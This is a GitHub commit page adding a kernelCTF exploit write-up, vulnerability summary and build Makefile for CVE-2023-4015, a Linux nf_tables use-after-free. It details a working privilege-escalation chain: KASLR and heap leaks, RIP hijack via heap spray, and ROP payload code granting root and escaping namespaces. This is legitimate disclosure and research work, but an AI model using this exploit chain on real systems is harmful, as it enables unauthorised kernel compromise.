Skip to content

Commit

Permalink
Add kernelCTF CVE-2023-4015_lts (#101)
Browse files Browse the repository at this point in the history
* Add kernelCTF CVE-2023-4015_lts

* update exploit.md and exploit.c
  • Loading branch information
kevinrich1337 authored Jun 21, 2024
1 parent 63b6cb1 commit 9417433
Show file tree
Hide file tree
Showing 8 changed files with 1,500 additions and 0 deletions.
322 changes: 322 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4015_lts/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,322 @@
### Triggering Vulnerability

If an error occurs when creating a new rule in the `nf_tables_newrule`, the `nft_rule_expr_deactivate` is called with the `NFT_TRANS_PREPARE_ERROR` as an argument [1].

```c
static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
...

return 0;

err_destroy_flow_rule:
if (flow)
nft_flow_rule_destroy(flow);
err_release_rule:
nft_rule_expr_deactivate(&ctx, rule, NFT_TRANS_PREPARE_ERROR); // [1]
nf_tables_rule_destroy(&ctx, rule);
err_release_expr:
for (i = 0; i < n; i++) {
if (expr_info[i].ops) {
module_put(expr_info[i].ops->type->owner);
if (expr_info[i].ops->type->release_ops)
expr_info[i].ops->type->release_ops(expr_info[i].ops);
}
}
kvfree(expr_info);

return err;
}
```
If immediate expr exists in the rule being created, the `nft_immediate_deactivate` is called. In the `NFT_TRANS_PREPARE_ERROR` phase, `nft_immediate_deactivate` calls `nft_rule_expr_deactivate` to deactivate rules in the bound chain [2] and calls `nf_tables_unbind_chain` to unbind the chain [3].
```c
static void nft_immediate_deactivate(const struct nft_ctx *ctx,
const struct nft_expr *expr,
enum nft_trans_phase phase)
{
const struct nft_immediate_expr *priv = nft_expr_priv(expr);
const struct nft_data *data = &priv->data;
struct nft_ctx chain_ctx;
struct nft_chain *chain;
struct nft_rule *rule;
if (priv->dreg == NFT_REG_VERDICT) {
switch (data->verdict.code) {
case NFT_JUMP:
case NFT_GOTO:
chain = data->verdict.chain;
if (!nft_chain_binding(chain))
break;
chain_ctx = *ctx;
chain_ctx.chain = chain;
list_for_each_entry(rule, &chain->rules, list)
nft_rule_expr_deactivate(&chain_ctx, rule, phase); // [2]
switch (phase) {
case NFT_TRANS_PREPARE_ERROR:
nf_tables_unbind_chain(ctx, chain); // [3]
fallthrough;
case NFT_TRANS_PREPARE:
nft_deactivate_next(ctx->net, chain);
break;
default:
nft_chain_del(chain);
chain->bound = false;
chain->table->use--;
break;
}
break;
default:
break;
}
}
if (phase == NFT_TRANS_COMMIT)
return;
return nft_data_release(&priv->data, nft_dreg_to_type(priv->dreg));
}
```

Afterwards, in the `ABORT` phase, the previously executed `NFT_MSG_NEWRULE` command is processed. At this time, since the rule is unbind in [3], the condition in [4] is not satisfied. Thus, the `nft_rule_expr_deactivate` in [5] is called. Since deactivate is already performed in [2], `nft_immediate_deactivate` is called twice for one rule (`NFT_TRANS_PREPARE_ERROR` and `NFT_TRANS_ABORT` phases), and this leads underflow of `chain->use` in `nft_data_release`.

```c
static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
{
...
case NFT_MSG_NEWRULE:
if (nft_trans_rule_bound(trans)) { // [4]
nft_trans_destroy(trans);
break;
}
trans->ctx.chain->use--;
list_del_rcu(&nft_trans_rule(trans)->list);
nft_rule_expr_deactivate(&trans->ctx, // [5]
nft_trans_rule(trans),
NFT_TRANS_ABORT);
if (trans->ctx.chain->flags & NFT_CHAIN_HW_OFFLOAD)
nft_flow_rule_destroy(nft_trans_flow_rule(trans));
break;
```
We can trigger the vulnerability as follows:
- Create three chains, `Base`, `Vulnerable`, and `Victim`. Set `NFT_CHAIN_BINDING` flag for `Vulnerable`.
- Create a rule `R2` in `Vulnerable` with an immediate expr referencing the `Victim`.
- Create a rule `R1` in `Base` with two immediate exprs referencing the `Vulnerable`. The vulnerability is triggered because it attempts to create an immediate expr that already exists. This results in the `Victim` having a reference count of -1.
### KASLR Bypass
The KASLR address is leaked through `chain->name`, which is stored in the verdict data of the immediate expr (`nft_immediate_expr.data.verdict`). The leak process is as follows:
- Create three chains, `Base`, `Vulnerable`, and `Victim`. Set `NFT_CHAIN_BINDING` flag for `Vulnerable`. Make the `Victim`'s name 9-16 bytes long so that it can be allocated into `kmalloc-cg-16`.
- Create a rule in `Base` with an immediate expr referencing the `Vulnerable`.
- Create a rule in `Vulnerable` with an immediate expr referencing `Victim`.
- Trigger the vulnerability. This results in the `Victim` having a reference count of -1.
- Create an immediate expr in `Base` that references to the Victim, making the `Victim`'s reference count 0, and destroy the `Victim`.
- Spray counter exprs (`struct nft_expr`) to place it at `Victim`'s chain->name. At this time, the size of counter expr (`struct nft_expr`) is 16 bytes, so the counter exprs are allocated in the `kmalloc-cg-16`.
- We dump the immediate expr of `Base` using `GETRULE` command, we can get the ops address of counter expr through the freed `chain->name` to get the kernel base address [6].
```c
int nft_verdict_dump(struct sk_buff *skb, int type, const struct nft_verdict *v)
{
struct nlattr *nest;
nest = nla_nest_start_noflag(skb, type);
if (!nest)
goto nla_put_failure;
if (nla_put_be32(skb, NFTA_VERDICT_CODE, htonl(v->code)))
goto nla_put_failure;
switch (v->code) {
case NFT_JUMP:
case NFT_GOTO:
if (nla_put_string(skb, NFTA_VERDICT_CHAIN,
v->chain->name)) // [6]
goto nla_put_failure;
}
nla_nest_end(skb, nest);
return 0;
nla_put_failure:
return -1;
}
```

### Heap Address Leak

We leak the heap address in the same way as we leak the kernel base address. To leak the heap address, we sprayed the `nft_rule` instead of counter expr. We place `nft_rule` in freed `Victim`'s `nft_chain->name` and dump the rule of the `Base`. As a result, we can read the heap address stored in `nft_rule->list` through `Victim`'s `nft_chain->name`. We put the address of the `kmalloc-cg-96` object in `list->next` and the address of the `kmalloc-cg-192` object in `list->prev` by creating `nft_rules`. The size of the `nft_rule` can be adjusted by adding multiple `nft_exprs` inside the `nft_rule`. Since data of type string is used for leaking, we repeated the entire exploit until the heap address does not contain null.

### RIP Control

We use `nft_chain->blob_gen_0` to control the RIP. The `nft_chain->blob_gen_0` is used when evaluating packets in the `nft_do_chain` function [7].

```c
nft_do_chain(struct nft_pktinfo *pkt, void *priv)
{
...
do_chain:
if (genbit)
blob = rcu_dereference(chain->blob_gen_1);
else
blob = rcu_dereference(chain->blob_gen_0); // [7]

rule = (struct nft_rule_dp *)blob->data;
last_rule = (void *)blob->data + blob->size;
next_rule:
regs.verdict.code = NFT_CONTINUE;
for (; rule < last_rule; rule = nft_rule_next(rule)) {
nft_rule_dp_for_each_expr(expr, last, rule) {
if (expr->ops == &nft_cmp_fast_ops)
nft_cmp_fast_eval(expr, &regs);
else if (expr->ops == &nft_cmp16_fast_ops)
nft_cmp16_fast_eval(expr, &regs);
else if (expr->ops == &nft_bitwise_fast_ops)
nft_bitwise_fast_eval(expr, &regs);
else if (expr->ops != &nft_payload_fast_ops ||
!nft_payload_fast_eval(expr, &regs, pkt))
expr_call_ops_eval(expr, &regs, pkt);

if (regs.verdict.code != NFT_CONTINUE)
break;
}
...
```
To do this, we assign `chain->blob_gen_0` to `kmalloc-cg-64` and trigger the vulnerability. `chain->blob_gen_0` is allocated in the `nf_tables_chain_alloc_rules` when creating new chain [5]. `chain->blob_gen_0` is allocated from the `nf_tables_chain_alloc_rules` when creating a new chain [8].
```c
static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
u8 policy, u32 flags,
struct netlink_ext_ack *extack)
{
...
data_size = offsetof(struct nft_rule_dp, data); /* last rule */
blob = nf_tables_chain_alloc_rules(data_size); // [8]
if (!blob) {
err = -ENOMEM;
goto err_destroy_chain;
}
```

The size used by `kvmalloc` [9] is 40, `offsetof(struct nft_rule_dp, data)` + `sizeof(struct nft_rule_blob)` + `sizeof(struct nft_rules_old)` (8 + 24 + 8), the `blob` object is allocated in `kmalloc-cg-64`.

```c
static struct nft_rule_blob *nf_tables_chain_alloc_rules(unsigned int size)
{
struct nft_rule_blob *blob;

/* size must include room for the last rule */
if (size < offsetof(struct nft_rule_dp, data))
return NULL;

size += sizeof(struct nft_rule_blob) + sizeof(struct nft_rules_old);
if (size > INT_MAX)
return NULL;

blob = kvmalloc(size, GFP_KERNEL_ACCOUNT); // [9]
if (!blob)
return NULL;

blob->size = 0;
nft_last_rule(blob, blob->data);

return blob;
}
```
We then spray the `udata` of the `struct nft_table` and place it in freed `blob_gen_0`. Finally, when a packet is sent, a sprayed fake ops address is referenced, resulting in RIP control [10].
```c
static void expr_call_ops_eval(const struct nft_expr *expr,
struct nft_regs *regs,
struct nft_pktinfo *pkt)
{
#ifdef CONFIG_RETPOLINE
unsigned long e = (unsigned long)expr->ops->eval;
#define X(e, fun) \
do { if ((e) == (unsigned long)(fun)) \
return fun(expr, regs, pkt); } while (0) // [10]
X(e, nft_payload_eval);
X(e, nft_cmp_eval);
X(e, nft_counter_eval);
X(e, nft_meta_get_eval);
X(e, nft_lookup_eval);
X(e, nft_range_eval);
X(e, nft_immediate_eval);
X(e, nft_byteorder_eval);
X(e, nft_dynset_eval);
X(e, nft_rt_get_eval);
X(e, nft_bitwise_eval);
#undef X
#endif /* CONFIG_RETPOLINE */
expr->ops->eval(expr, regs, pkt);
}
```

### Post RIP

Store the ROP payload below to the `kmalloc-cg-96` and `kmalloc-cg-192` addresses leaked above, and execute it. The ROP payload of `kmalloc-cg-192` is stored in `nft_rule->data` when the rule is created during the heap spraying. The ROP payload of `kmalloc-cg-96` is stored by spraying `nft_table->udata` after freeing the rule used in the heap spray.

```c
void make_payload(uint64_t* data){
int i = 0;

data[i++] = kbase + push_rbx_pop_rsp;

// commit_creds(&init_cred)
data[i++] = kbase + pop_rdi_ret;
data[i++] = kbase + init_cred_off;
data[i++] = kbase + commit_creds_off;

// current = find_task_by_vpid(getpid())
data[i++] = kbase + pop_rdi_ret;
data[i++] = getpid();
data[i++] = kbase + find_task_by_vpid_off;

// current += offsetof(struct task_struct, rcu_read_lock_nesting)
data[i++] = kbase + pop_rsi_ret;
data[i++] = 0x474;
data[i++] = kbase + add_rax_rsi_ret;

data[i++] = kbase + pop_rsp_ret;
data[i++] = heap_addr1+0x20;
}

void make_payload2(uint64_t* data){
int i = 0;

// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
data[i++] = kbase + pop_rcx_ret;
data[i++] = -0xffff;
data[i++] = kbase + mov_rax_rcx_ret;

// find_task_by_vpid(1)
data[i++] = kbase + pop_rdi_ret;
data[i++] = 1;
data[i++] = kbase + find_task_by_vpid_off;

// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
data[i++] = kbase + mov_rdi_rax_ret;
data[i++] = kbase + pop_rsi_ret;
data[i++] = kbase + init_nsproxy_off;
data[i++] = kbase + switch_task_namespaces_off;

// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
data[i++] = kbase + swapgs_restore_regs_and_return_to_usermode_off;
data[i++] = 0; // rax
data[i++] = 0; // rdx
data[i++] = _user_rip; // user_rip
data[i++] = _user_cs; // user_cs
data[i++] = _user_rflags; // user_rflags
data[i++] = _user_sp; // user_sp
data[i++] = _user_ss; // user_ss
}
```
12 changes: 12 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4015_lts/docs/vulnerability.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
- Requirements:
- Capabilites: CAP_NET_ADMIN
- Kernel configuration: CONFIG_NETFILTER=y, CONFIG_NF_TABLES=y
- User namespaces required: Yes
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4bedf9eee016
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a771f7b266b02d262900c75f1e175c7fe76fec2
- Affected Version: v6.4 - v6.5-rc2
- Affected Component: net/netfilter
- Syscall to disable: disallow unprivileged username space
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-4015
- Cause: Use-After-Free
- Description: A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. On an error when building a nftables rule, deactivating immediate expressions in nft_immediate_deactivate() can lead unbinding the chain and objects be deactivated but later used. We recommend upgrading past commit 0a771f7b266b02d262900c75f1e175c7fe76fec2.
39 changes: 39 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4015_lts/exploit/lts-6.1.36/Makefile
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
LIBMNL_DIR = $(realpath ./)/libmnl_build
LIBNFTNL_DIR = $(realpath ./)/libnftnl_build

LIBS = -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl
INCLUDES = -I$(LIBNFTNL_DIR)/libnftnl-1.2.5/include -I$(LIBMNL_DIR)/libmnl-1.0.5/include
CFLAGS = -static -s

exploit:
gcc -o exploit exploit.c $(LIBS) $(INCLUDES) $(CFLAGS)

prerequisites: libnftnl-build

libmnl-build : libmnl-download
tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2
cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install`
cd $(LIBMNL_DIR)/libmnl-1.0.5 && make -j`nproc`
cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install

libnftnl-build : libmnl-build libnftnl-download
tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install`
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make -j`nproc`
cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install

libmnl-download :
mkdir $(LIBMNL_DIR)
wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2

libnftnl-download :
mkdir $(LIBNFTNL_DIR)
wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz

run:
./exploit

clean:
rm -f exploit
rm -rf $(LIBMNL_DIR)
rm -rf $(LIBNFTNL_DIR)
Binary file not shown.
Loading

0 comments on commit 9417433

Please sign in to comment.